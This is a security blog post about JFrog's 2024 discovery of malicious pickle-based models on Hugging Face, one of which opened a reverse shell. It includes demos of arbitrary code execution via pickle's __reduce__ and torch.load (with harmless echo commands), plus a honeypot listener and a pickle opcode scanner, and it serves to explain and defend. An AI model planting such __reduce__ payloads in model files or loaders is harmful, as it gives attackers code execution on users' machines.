

Understanding the Hugging Face backdoor threat

AI collaboration platform Hugging Face could be susceptible to model-based attacks. Here's what we know so far.

Yair Divinsky | February 29, 2024

In the realm of AI collaboration, Hugging Face reigns supreme. But could it be the target of model-based attacks? Recent findings from JFrog suggest a concerning possibility, prompting a closer look at the platform’s security and signaling a new era of caution in AI research. 

Here’s what we learned:

TL;DR

The discovery of malicious functionality in models hosted on Hugging Face highlights growing security concerns for AI models and demonstrates the potential for targeted attacks.

Key points:

  • 100 malicious PyTorch and TensorFlow Keras models identified on Hugging Face by JFrog.
  • Malicious payloads in these models could include backdoors for remote code execution.
  • Security challenges encompass data poisoning, model theft, adversarial attacks, privacy issues, and supply chain risks.
  • An example involved a PyTorch model from the user “baller423” that exploited Python’s pickle module to achieve remote code execution.
  • JFrog’s response includes advanced scanning technologies, honeypot deployment for threat analysis, and detailed mitigation recommendations for data scientists.
  • Hugging Face has implemented malware, pickle, and secrets scanning, yet vulnerabilities persist, underlining the importance of ongoing security enhancements.

Introduction to AI model security

The discussion around AI and machine learning (ML) model security is still not widespread enough, and this blog post aims to broaden the conversation on the topic.

This area encompasses a wide range of security measures designed to safeguard the integrity, confidentiality, and availability of AI systems. As AI models become increasingly integral to various sectors, including healthcare, finance, and national security, ensuring their security is paramount. The unique challenges in AI model security include:

Unique challenges

Data poisoning: Attackers can manipulate the training data to compromise the model’s performance or cause it to make incorrect predictions. 

Model stealing: Competitors or malicious actors may attempt to replicate a proprietary AI model by querying it with inputs and using the outputs to train a similar model. 

Adversarial attacks: Slight, often imperceptible alterations to input data can lead to incorrect outputs from the AI model, exploiting vulnerabilities in the model’s interpretative logic (a minimal code sketch follows this list).

Privacy leaks: AI models, especially those trained on sensitive or personal data, can inadvertently reveal information about the training data through their outputs. 

Supply chain attacks: Compromises in the supply chain can affect the integrity of AI models by introducing vulnerabilities at any point from development to deployment. 
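Of these challenges, the adversarial attack is perhaps the easiest to illustrate in code. Below is a minimal, hypothetical FGSM-style sketch in PyTorch; the model, input tensor, and label are assumed to already exist, and nothing in it comes from the Hugging Face findings.

import torch
import torch.nn.functional as F

def fgsm_perturb(model, x, label, epsilon=0.01):
    # Compute the loss gradient with respect to the input, then nudge the input
    # in the direction that increases the loss. For small epsilon the change is
    # imperceptible to a human, yet it can flip the model's prediction.
    x = x.clone().detach().requires_grad_(True)
    loss = F.cross_entropy(model(x), label)
    loss.backward()
    return (x + epsilon * x.grad.sign()).detach()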

 

Unveiling the threat: Silent backdoors in ML models

As it does with other open-source repositories, JFrog regularly monitors and scans AI models uploaded by users. One of its researchers, David Cohen, discovered a model that executes code the moment its pickle file is loaded. The payload grants the attacker a shell on the compromised machine, giving them full control over the victim’s machine through what is commonly referred to as a “backdoor”.

JFrog implemented a sophisticated scanning technology to scrutinize PyTorch and TensorFlow Keras models available on Hugging Face, identifying a hundred models exhibiting malicious characteristics.

“It’s crucial to emphasize that when we refer to ‘malicious models,’ we specifically denote those housing real, harmful payloads,” the JFrog report states. 

“This count excludes false positives, ensuring a genuine representation of the distribution of efforts towards producing malicious models for PyTorch and Tensorflow on Hugging Face.” 

Code execution can happen when loading certain types of ML models from an untrusted source. For example, many models are distributed in the “pickle” format, a common way of serializing Python objects. Pickle files, however, can contain arbitrary code that runs the moment the file is loaded.
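The danger is easy to demonstrate with a few lines of Python. The sketch below is a harmless stand-in: an “echo” command takes the place of a real payload, but the mechanism is exactly the one being abused here.

import os
import pickle

class Payload:
    def __reduce__(self):
        # pickle calls __reduce__ to learn how to rebuild an object, then invokes
        # whatever callable it returns at load time, with no questions asked.
        return (os.system, ("echo 'code executed simply by loading this pickle'",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # the command runs right here: loading alone is enough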

 

Attack mechanism

A notable instance involved a PyTorch model, uploaded by a user called “baller423” and since deleted from Hugging Face, which harbored a payload that opened a reverse shell to a predetermined host (210.117.212.93).

[Image: the malicious payload found in the model uploaded by “baller423”]

The nefarious payload leveraged the “__reduce__” method of Python’s pickle module to run arbitrary code when the PyTorch model file was loaded, slipping the malicious code inside the trusted serialization process and thereby bypassing common security measures.
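Because torch.save and torch.load rely on pickle under the hood, the same trick works through the normal model-loading path. The snippet below is a hypothetical, harmless reconstruction of the mechanism, not the actual payload JFrog found.

import os
import torch

class PoisonedExtra:
    def __reduce__(self):
        return (os.system, ("echo 'executed while loading the model file'",))

# An attacker bundles the booby-trapped object alongside ordinary checkpoint data.
torch.save({"state_dict": {}, "extra": PoisonedExtra()}, "model.bin")

# The victim only has to load the file; with legacy (non weights-only) loading
# the payload fires before any weights are even used.
torch.load("model.bin", weights_only=False)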

 

Establishing a honeypot for analysis

To gain additional insights into the actors’ intentions, JFrog set up a honeypot on an external server, completely isolated from any sensitive networks. By mimicking legitimate systems or services, a honeypot can attract various types of attacks, allowing defenders to monitor and analyze the attackers’ activity.
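JFrog has not published the internals of its setup, but the core idea of a honeypot can be sketched in a few lines of Python: an isolated machine listens on the port the payload is expected to call back to and records every connection attempt for later analysis. The port below is an arbitrary placeholder.

import socket
from datetime import datetime, timezone

HOST, PORT = "0.0.0.0", 4444  # placeholder port; run only on an isolated host

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen()
    while True:
        conn, addr = srv.accept()
        with conn:
            stamp = datetime.now(timezone.utc).isoformat()
            first_bytes = conn.recv(1024)  # record whatever the attacker sends first
            print(f"{stamp} connection from {addr[0]}:{addr[1]} -> {first_bytes!r}")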

[Image: the honeypot environment set up for monitoring]

Analyzing IP WHOIS lookup results

Further investigation into the IP address range, which belongs to KREONET, a South Korean research network, suggests potential ties between the authors of these models and researchers or AI practitioners.
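This kind of lookup is easy to reproduce: WHOIS (RFC 3912) is just a plain-text query over TCP port 43. The sketch below queries IANA and then the regional registry for the address mentioned above; the exact referral chain and record contents may differ when you run it.

import socket

def whois(query: str, server: str = "whois.iana.org") -> str:
    # Send the query terminated by CRLF and read until the server closes the connection.
    with socket.create_connection((server, 43), timeout=10) as s:
        s.sendall((query + "\r\n").encode())
        chunks = []
        while data := s.recv(4096):
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

print(whois("210.117.212.93"))                            # IANA referral
print(whois("210.117.212.93", server="whois.apnic.net"))  # regional registry record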

[Image: WHOIS lookup results for the payload’s IP address]

Mitigating the risks: Recommendations for data scientists

To mitigate risks associated with malicious models and potential code execution vulnerabilities, data scientists should adopt proactive measures such as source verification, security scans, safe loading methods, updating dependencies, reviewing model code, isolating environments, and educating users.
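“Safe loading methods” is worth making concrete. Below is a minimal sketch, assuming a locally downloaded checkpoint (the file names are placeholders): prefer weights-only loading, or better yet a format such as safetensors that cannot carry executable code at all.

import torch
from safetensors.torch import load_file

# Weights-only loading restricts unpickling to tensors and plain containers,
# so a __reduce__-style payload raises an error instead of executing.
state_dict = torch.load("model.bin", map_location="cpu", weights_only=True)

# safetensors stores raw tensor data with no serialized Python objects at all.
state_dict = load_file("model.safetensors")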

Hugging Face’s security measures

Hugging Face, a platform for AI collaboration, has implemented several security measures, such as malware scanning, pickle scanning, and secrets scanning, to counter these attacks. These features scan every file in a repository for malicious code, unsafe deserialization, or sensitive information, and alert users or moderators accordingly. Despite these measures, recent incidents are a stark reminder that the platform is not immune to real threats.
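Conceptually, pickle scanning amounts to walking a pickle’s opcode stream without executing it and flagging opcodes that can import or call code. The sketch below uses Python’s standard pickletools module as a rough illustration; it is not Hugging Face’s actual scanner, and the opcode list is only a simplistic heuristic.

import pickletools

SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}

def flag_suspicious_opcodes(pickle_bytes: bytes) -> list[str]:
    # genops parses the opcode stream without running it, so scanning is safe.
    findings = []
    for opcode, arg, pos in pickletools.genops(pickle_bytes):
        if opcode.name in SUSPICIOUS:
            findings.append(f"{opcode.name} at byte {pos}: {arg!r}")
    return findings

# Note: a modern PyTorch checkpoint is a zip archive whose pickle lives in
# "data.pkl"; extract that member first, then pass its bytes to this function.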

 

Next steps 

Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: 

  1. 2023 Vulnerability watch reports 
  2. The MITRE ATT&CK framework: Getting started
  3. The true impact of exploitable vulnerabilities for 2024
  4. Multi-cloud security challenges – a best practice guide
  5. How to properly tackle zero-day threats
